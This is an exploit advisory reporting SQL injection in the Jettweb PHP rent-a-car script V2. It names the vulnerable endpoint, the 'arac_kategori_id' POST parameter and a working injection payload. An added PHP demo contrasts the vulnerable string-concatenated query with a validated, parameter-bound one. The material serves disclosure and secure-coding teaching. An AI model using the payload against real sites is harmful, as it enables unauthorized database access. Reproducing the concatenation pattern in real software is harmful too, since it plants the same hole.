Jettweb PHP Hazir Rent A Car Sitesi Scripti version 2 suffers from a remote SQL injection vulnerability.
620a81c8dfcb37bcad977a0d288b1b4742cc0ac2dfd84d6049d425c0c24def05
# Exploit Title: Jettweb PHP Hazır Rent A Car Sitesi Scripti V2 - 'arac_kategori_id' SQL Injection
# Date: 28.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-4-php-hazir-rent-a-car-sitesi-scripti-v2.html
# Demo Site: http://rentv2.proemlaksitesi.net/
# Version: V2
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
Request: http://localhost/[PATH]/fiyat-goster.html
Vulnerable Parameter: arac_kategori_id (POST)
Payload: arac_kategori_id=-1' OR 3*2*1=6 AND 000224=000224 --
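
Added example, not code from the advisory or from the vendor's script: the string-concatenation pattern that produces this class of flaw, next to a validated and bound query, both run against the payload value quoted above. The script's source and schema are not published here, so the table `araclar`, the column `fiyat` and both function names are hypothetical; the demo assumes PHP with the pdo_sqlite extension and uses an in-memory database with constructed rows.

```php
<?php
// Added example. Schema is assumed: table "araclar" and column "fiyat" are
// hypothetical; only the parameter name arac_kategori_id comes from the advisory.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE araclar (id INTEGER PRIMARY KEY, arac_kategori_id INTEGER, fiyat INTEGER)');
$db->exec('INSERT INTO araclar (arac_kategori_id, fiyat) VALUES (1, 250), (2, 400), (3, 900)');

// Vulnerable pattern: the POST value becomes part of the SQL text, so a quote
// in the value ends the string literal and the rest is parsed as SQL.
function fiyat_vulnerable(PDO $db, string $kategoriId): array
{
    $sql = "SELECT fiyat FROM araclar WHERE arac_kategori_id = '$kategoriId'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: accept only a positive integer, then bind it as a typed
// parameter so the value is never parsed as SQL.
function fiyat_hardened(PDO $db, string $kategoriId): array
{
    $id = filter_var($kategoriId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return []; // a real handler would answer HTTP 400 and log the request
    }
    $stmt = $db->prepare('SELECT fiyat FROM araclar WHERE arac_kategori_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed inputs: a normal category id and the payload value from the PoC.
$inputs = ['2', "-1' OR 3*2*1=6 AND 000224=000224 -- "];
foreach ($inputs as $value) {
    printf(
        "input=%s  concatenated: %d row(s)  bound: %d row(s)\n",
        var_export($value, true),
        count(fiyat_vulnerable($db, $value)),
        count(fiyat_hardened($db, $value))
    );
}
```

With a MySQL backend, also set `PDO::ATTR_EMULATE_PREPARES` to `false` so the driver uses server-side prepared statements.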